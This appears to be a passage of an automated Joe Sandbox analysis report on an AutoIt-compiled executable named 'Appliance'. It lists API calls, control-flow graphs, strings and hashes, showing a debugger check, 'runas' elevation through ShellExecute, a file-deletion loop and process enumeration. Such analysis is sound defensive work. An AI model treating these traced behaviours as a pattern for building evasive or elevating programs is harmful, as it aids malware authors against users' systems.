                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DC3368,?), ref: 00DC33BB
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DC3368,?), ref: 00DC33CE
                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E92418,00E92400,?,?,?,?,?,?,00DC3368,?), ref: 00DC343A
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                              • Part of subcall function 00DC425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3462,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC42A0
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC34BB
                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E03CB0
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00E03CF1
                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E831F4,00E92418,?,?,?,?,?,?,?,00DC3368), ref: 00E03D7A
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E03D81
                                                                                                                                              • Part of subcall function 00DC34D3: GetSysColorBrush.USER32(0000000F), ref: 00DC34DE
                                                                                                                                              • Part of subcall function 00DC34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00DC34ED
                                                                                                                                              • Part of subcall function 00DC34D3: LoadIconW.USER32(00000063), ref: 00DC3503
                                                                                                                                              • Part of subcall function 00DC34D3: LoadIconW.USER32(000000A4), ref: 00DC3515
                                                                                                                                              • Part of subcall function 00DC34D3: LoadIconW.USER32(000000A2), ref: 00DC3527
                                                                                                                                              • Part of subcall function 00DC34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC353F
                                                                                                                                              • Part of subcall function 00DC34D3: RegisterClassExW.USER32(?), ref: 00DC3590
                                                                                                                                              • Part of subcall function 00DC35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC35E1
                                                                                                                                              • Part of subcall function 00DC35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3602
                                                                                                                                              • Part of subcall function 00DC35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC3616
                                                                                                                                              • Part of subcall function 00DC35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC361F
                                                                                                                                              • Part of subcall function 00DC396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC3A3C
                                                                                                                                            Strings
                                                                                                                                            • 0$, xrefs: 00DC3495
                                                                                                                                            • AutoIt, xrefs: 00E03CA5
                                                                                                                                            • runas, xrefs: 00E03D75
                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E03CAA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                            • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                            • API String ID: 683915450-3328958999
                                                                                                                                            • Opcode ID: 22e245aa1650b4d4f1b7962b631543eb67eeb559f16d3fbb6b72f433bd68f057
                                                                                                                                            • Instruction ID: 8dcf978cd502e8e1cade87217bb17322fdb40ccafbcfb4771b4ad26af20c3727
                                                                                                                                            • Opcode Fuzzy Hash: 22e245aa1650b4d4f1b7962b631543eb67eeb559f16d3fbb6b72f433bd68f057
                                                                                                                                            • Instruction Fuzzy Hash: 3251F37014C342BEDB15FF719C02E6E7BA8EB94704F00142EF596771A2CA248A8DDB72

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1741 e2dc54-e2dc9b call dcbf73 * 3 call dc5851 call e2eab0 1752 e2dcab-e2dcdc call dc568e FindFirstFileW 1741->1752 1753 e2dc9d-e2dca6 call dc6b7c 1741->1753 1757 e2dd4b-e2dd52 FindClose 1752->1757 1758 e2dcde-e2dce0 1752->1758 1753->1752 1759 e2dd56-e2dd78 call dcbd98 * 3 1757->1759 1758->1757 1760 e2dce2-e2dce7 1758->1760 1762 e2dd26-e2dd38 FindNextFileW 1760->1762 1763 e2dce9-e2dd24 call dcbed9 call dc7bb5 call dc6b7c DeleteFileW 1760->1763 1762->1758 1765 e2dd3a-e2dd40 1762->1765 1763->1762 1776 e2dd42-e2dd49 FindClose 1763->1776 1765->1758 1776->1759
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871
                                                                                                                                              • Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E2DCCB
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DD1B
                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E2DD2C
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E2DD43
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E2DD4C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                            • String ID: \*.*
                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                            • Opcode ID: 1c695f6071f6e2f03b2042622d06dcf29b9b939f7771b7652e20db17d40a99a1
                                                                                                                                            • Instruction ID: db202f59da66a3a25c566acbe65eec0c096e433128a900c9de049e658196d239
                                                                                                                                            • Opcode Fuzzy Hash: 1c695f6071f6e2f03b2042622d06dcf29b9b939f7771b7652e20db17d40a99a1
                                                                                                                                            • Instruction Fuzzy Hash: 74315B3100C3569FC205EB60DC82EAFB7A8AE95314F405E5DF5D6A31A1EB21DA09CB73
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00E2DDAC
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00E2DDBA
                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00E2DDDA
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E2DE87
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                            • Opcode ID: 35b1af0adddb922d52b5ce441826b51911ccee670317d03096aad892af70a927
                                                                                                                                            • Instruction ID: 01333eb34d32b83252a0231154ce3ab017e54a9a0d0f226f407996e708a33c9a
                                                                                                                                            • Opcode Fuzzy Hash: 35b1af0adddb922d52b5ce441826b51911ccee670317d03096aad892af70a927
                                                                                                                                            • Instruction Fuzzy Hash: 53316D724083019FD314EF60DC85BABBBE8EF99354F04092DF582971A1DB71D989CBA2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2407445808-0
                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                            • Instruction ID: 92c929e535d8ea9afbc77985ed3c02afd7a78189941e3b17cc176a8e7e94bf0d
                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                            • Instruction Fuzzy Hash: 1831E670A00145DFC718EF5AD480A69FBB6FF49300B6886A5E449CB656D7B2EDC1CBE0

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 ddac3e-ddb063 call dc8ec0 call ddbc58 call dce6a0 7 ddb069-ddb073 0->7 8 e18584-e18591 0->8 9 ddb079-ddb07e 7->9 10 e1896b-e18979 7->10 11 e18593 8->11 12 e18596-e185a5 8->12 13 e185b2-e185b4 9->13 14 ddb084-ddb090 call ddb5b6 9->14 17 e1897b 10->17 18 e1897e 10->18 11->12 15 e185a7 12->15 16 e185aa 12->16 21 e185bd 13->21 14->21 25 ddb096-ddb0a3 call dcc98d 14->25 15->16 16->13 17->18 20 e18985-e1898e 18->20 22 e18990 20->22 23 e18993 20->23 26 e185c7 21->26 22->23 27 e1899c-e189eb call dce6a0 call ddbbbe * 2 23->27 33 ddb0ab-ddb0b4 25->33 31 e185cf-e185d2 26->31 64 e189f1-e18a03 call ddb5b6 27->64 65 ddb1e0-ddb1f5 27->65 34 ddb158-ddb16f 31->34 35 e185d8-e18600 call de4cd3 call dc7ad5 31->35 37 ddb0b8-ddb0d6 call de4d98 33->37 40 e18954-e18957 34->40 41 ddb175 34->41 76 e18602-e18606 35->76 77 e1862d-e18651 call dc7b1a call dcbd98 35->77 56 ddb0d8-ddb0e1 37->56 57 ddb0e5 37->57 45 e18a41-e18a79 call dce6a0 call ddbbbe 40->45 46 e1895d-e18960 40->46 47 ddb17b-ddb17e 41->47 48 e188ff-e18920 call dce6a0 41->48 45->65 106 e18a7f-e18a91 call ddb5b6 45->106 46->27 53 e18962-e18965 46->53 54 e18729-e18743 call ddbbbe 47->54 55 ddb184-ddb187 47->55 48->65 69 e18926-e18938 call ddb5b6 48->69 53->10 53->65 85 e18749-e1874c 54->85 86 e1888f-e188b5 call dce6a0 54->86 66 ddb18d-ddb190 55->66 67 e186ca-e186e0 call dc6c03 55->67 56->37 68 ddb0e3 56->68 57->26 60 ddb0eb-ddb0fc 57->60 60->10 70 ddb102-ddb11c 60->70 97 e18a05-e18a0d 64->97 98 e18a2f-e18a3c call dcc98d 64->98 71 ddb1fb-ddb20b call dce6a0 65->71 72 e18ac9-e18acf 65->72 79 e18656-e18659 66->79 80 ddb196-ddb1b8 call dce6a0 66->80 67->65 95 e186e6-e186fc call ddb5b6 67->95 68->60 117 e18945 69->117 118 e1893a-e18943 call dcc98d 69->118 70->31 82 ddb122-ddb154 call ddbbbe call dce6a0 70->82 72->33 88 e18ad5 72->88 76->77 90 e18608-e1862b call dcad40 76->90 77->79 79->10 83 e1865f-e18674 call dc6c03 79->83 80->65 114 ddb1ba-ddb1cc call ddb5b6 80->114 82->34 83->65 137 e1867a-e18690 call ddb5b6 83->137 104 e187bf-e187de call dce6a0 85->104 105 e1874e-e18751 85->105 86->65 124 e188bb-e188cd call ddb5b6 86->124 88->10 90->76 90->77 143 e1870d-e18716 call dc8ec0 95->143 144 e186fe-e1870b call dc8ec0 95->144 112 e18a0f-e18a13 97->112 113 e18a1e-e18a29 call dcb4b1 97->113 150 e18ac2-e18ac4 98->150 104->65 142 e187e4-e187f6 call ddb5b6 104->142 120 e18757-e18774 call dce6a0 105->120 121 e18ada-e18ae8 105->121 154 e18a93-e18a9b 106->154 155 e18ab5-e18abe call dcc98d 106->155 112->113 130 e18a15-e18a19 112->130 113->98 161 e18b0b-e18b19 113->161 162 e186ba-e186c3 call dcc98d 114->162 163 ddb1d2-ddb1de 114->163 136 e18949-e1894f 117->136 118->136 120->65 165 e1877a-e1878c call ddb5b6 120->165 128 e18aea 121->128 129 e18aed-e18afd 121->129 169 e188cf-e188dc call dcc98d 124->169 170 e188de 124->170 128->129 145 e18b02-e18b06 129->145 146 e18aff 129->146 147 e18aa1-e18aa3 130->147 136->65 178 e18692-e1869b call dcc98d 137->178 179 e1869d-e186ab call dc8ec0 137->179 142->65 185 e187fc-e18805 call ddb5b6 142->185 186 e18719-e18724 call dc8577 143->186 144->186 145->71 146->145 147->65 150->65 166 e18aa8-e18ab3 call dcb4b1 154->166 167 e18a9d 154->167 155->150 175 e18b1b 161->175 176 e18b1e-e18b21 161->176 162->67 163->65 191 e1879f 165->191 192 e1878e-e1879d call dcc98d 165->192 166->155 166->161 167->147 184 e188e2-e188e9 169->184 170->184 175->176 176->20 199 e186ae-e186b5 178->199 179->199 194 e188f5 call dc3907 184->194 195 e188eb-e188f0 call dc396b 184->195 210 e18807-e18816 call dcc98d 185->210 211 e18818 185->211 186->65 201 e187a3-e187ae call de9334 191->201 192->201 209 e188fa 194->209 195->65 199->65 201->10 215 e187b4-e187ba 201->215 209->65 214 e1881c-e1883f 210->214 211->214 217 e18841-e18848 214->217 218 e1884d-e18850 214->218 215->65 217->218 219 e18860-e18863 218->219 220 e18852-e1885b 218->220 221 e18873-e18876 219->221 222 e18865-e1886e 219->222 220->219 221->65 223 e1887c-e1888a 221->223 222->221 223->65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
                                                                                                                                            • API String ID: 0-2951036942
                                                                                                                                            • Opcode ID: 9e191e17ef87f176c2a41ac7c489bda5476547cf37d0c68ad82b0f755ebcd7d5
                                                                                                                                            • Instruction ID: 1708f9bb033e3d8fbe6ed2efb186eb8bd2a2b9c6cc4836a06ad86f8c33b22933
                                                                                                                                            • Opcode Fuzzy Hash: 9e191e17ef87f176c2a41ac7c489bda5476547cf37d0c68ad82b0f755ebcd7d5
                                                                                                                                            • Instruction Fuzzy Hash: F0624970508341CFC728DF14C585A9ABBE1FF88318F14995EE899AB351DB70D949CFA2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 355 dc370f-dc3724 356 dc3784-dc3786 355->356 357 dc3726-dc3729 355->357 356->357 358 dc3788 356->358 359 dc378a 357->359 360 dc372b-dc3732 357->360 361 dc376f-dc3777 DefWindowProcW 358->361 362 e03df4-e03e1c call dc2f92 call ddf23c 359->362 363 dc3790-dc3795 359->363 364 dc3738-dc373d 360->364 365 dc3804-dc380c PostQuitMessage 360->365 366 dc377d-dc3783 361->366 398 e03e21-e03e28 362->398 368 dc37bc-dc37e3 SetTimer RegisterWindowMessageW 363->368 369 dc3797-dc379a 363->369 370 e03e61-e03e75 call e2c8f7 364->370 371 dc3743-dc3747 364->371 367 dc37b8-dc37ba 365->367 367->366 368->367 376 dc37e5-dc37f0 CreatePopupMenu 368->376 374 e03d95-e03d98 369->374 375 dc37a0-dc37b3 KillTimer call dc3907 call dc59ff 369->375 370->367 390 e03e7b 370->390 377 dc374d-dc3752 371->377 378 dc380e-dc3818 call ddfcad 371->378 383 e03dd0-e03def MoveWindow 374->383 384 e03d9a-e03d9e 374->384 375->367 376->367 386 dc3758-dc375d 377->386 387 e03e46-e03e4d 377->387 392 dc381d 378->392 383->367 393 e03da0-e03da3 384->393 394 e03dbf-e03dcb SetFocus 384->394 388 dc37f2-dc3802 call dc381f 386->388 389 dc3763-dc3769 386->389 387->361 396 e03e53-e03e5c call e21423 387->396 388->367 389->361 389->398 390->361 392->367 393->389 399 e03da9-e03dba call dc2f92 393->399 394->367 396->361 398->361 403 e03e2e-e03e41 call dc3907 call dc396b 398->403 399->367 403->361
                                                                                                                                            APIs
                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DC3709,?,?), ref: 00DC3777
                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00DC3709,?,?), ref: 00DC37A3
                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC37C6
                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DC3709,?,?), ref: 00DC37D1
                                                                                                                                            • CreatePopupMenu.USER32 ref: 00DC37E5
                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00DC3806
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                            • String ID: 0$$0$$TaskbarCreated
                                                                                                                                            • API String ID: 129472671-3836791346
                                                                                                                                            • Opcode ID: bf2d9c1bbbaab8aaf6da58a211f31c0b3d15ed8ce937aa869a1cd5672b8adf56
                                                                                                                                            • Instruction ID: 2cb777bc49f0c273521c055e76495e90bac52dc643602d47be258ade8665389a
                                                                                                                                            • Opcode Fuzzy Hash: bf2d9c1bbbaab8aaf6da58a211f31c0b3d15ed8ce937aa869a1cd5672b8adf56
                                                                                                                                            • Instruction Fuzzy Hash: D241E2F0104247BEDF286B79DC4AF693A69EB44305F04822FF646B71D0DA749F488671

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00DC3657
                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00DC3681
                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC3692
                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00DC36AF
                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC36BF
                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00DC36D5
                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC36E4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                            • Opcode ID: b6108a10e5e97d0e57d9a6a908dfbd085ca248e386b524e71ac8d03711ded81b
                                                                                                                                            • Instruction ID: 4664f1de2b1136b3875e7ec3e97a56ede98aeee5e95abcef2947de6dcae74815
                                                                                                                                            • Opcode Fuzzy Hash: b6108a10e5e97d0e57d9a6a908dfbd085ca248e386b524e71ac8d03711ded81b
                                                                                                                                            • Instruction Fuzzy Hash: 6021EFB5905309AFDF14DFA6EC89BDEBBB4FB08711F00451BEA11B62A0D7B445488F91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 412 e009db-e00a0b call e007af 415 e00a26-e00a32 call df5594 412->415 416 e00a0d-e00a18 call def636 412->416 421 e00a34-e00a49 call def636 call def649 415->421 422 e00a4b-e00a94 call e0071a 415->422 423 e00a1a-e00a21 call def649 416->423 421->423 432 e00b01-e00b0a GetFileType 422->432 433 e00a96-e00a9f 422->433 430 e00cfd-e00d03 423->430 434 e00b53-e00b56 432->434 435 e00b0c-e00b3d GetLastError call def613 CloseHandle 432->435 437 e00aa1-e00aa5 433->437 438 e00ad6-e00afc GetLastError call def613 433->438 441 e00b58-e00b5d 434->441 442 e00b5f-e00b65 434->442 435->423 451 e00b43-e00b4e call def649 435->451 437->438 443 e00aa7-e00ad4 call e0071a 437->443 438->423 447 e00b69-e00bb7 call df54dd 441->447 442->447 448 e00b67 442->448 443->432 443->438 454 e00bc7-e00beb call e004cd 447->454 455 e00bb9-e00bc5 call e0092b 447->455 448->447 451->423 462 e00bed 454->462 463 e00bfe-e00c41 454->463 455->454 461 e00bef-e00bf9 call df8a2e 455->461 461->430 462->461 465 e00c62-e00c70 463->465 466 e00c43-e00c47 463->466 467 e00c76-e00c7a 465->467 468 e00cfb 465->468 466->465 470 e00c49-e00c5d 466->470 467->468 471 e00c7c-e00caf CloseHandle call e0071a 467->471 468->430 470->465 474 e00cb1-e00cdd GetLastError call def613 call df56a6 471->474 475 e00ce3-e00cf7 471->475 474->475 475->468
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E0071A: CreateFileW.KERNEL32(00000000,00000000,?,00E00A84,?,?,00000000,?,00E00A84,00000000,0000000C), ref: 00E00737
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E00AEF
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00E00AF6
                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00E00B02
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E00B0C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00E00B15
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E00B35
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E00C7F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E00CB1
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00E00CB8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                            • Opcode ID: ed4c1a951a3949d4ddb9bac38bb2c877ae0094c952f4a3e7ac5473d86f28e39a
                                                                                                                                            • Instruction ID: 82cdab99c3f5aa1fad131f1cbd6a98a54282291b98656b450c413bd49c388b82
                                                                                                                                            • Opcode Fuzzy Hash: ed4c1a951a3949d4ddb9bac38bb2c877ae0094c952f4a3e7ac5473d86f28e39a
                                                                                                                                            • Instruction Fuzzy Hash: 36A12732A041498FDF19AF68D851BAD7BA0EB06324F14119EF811FB3D1D7359D46CB62

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00DC55B2
                                                                                                                                              • Part of subcall function 00DC5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DC525A
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DC53C4
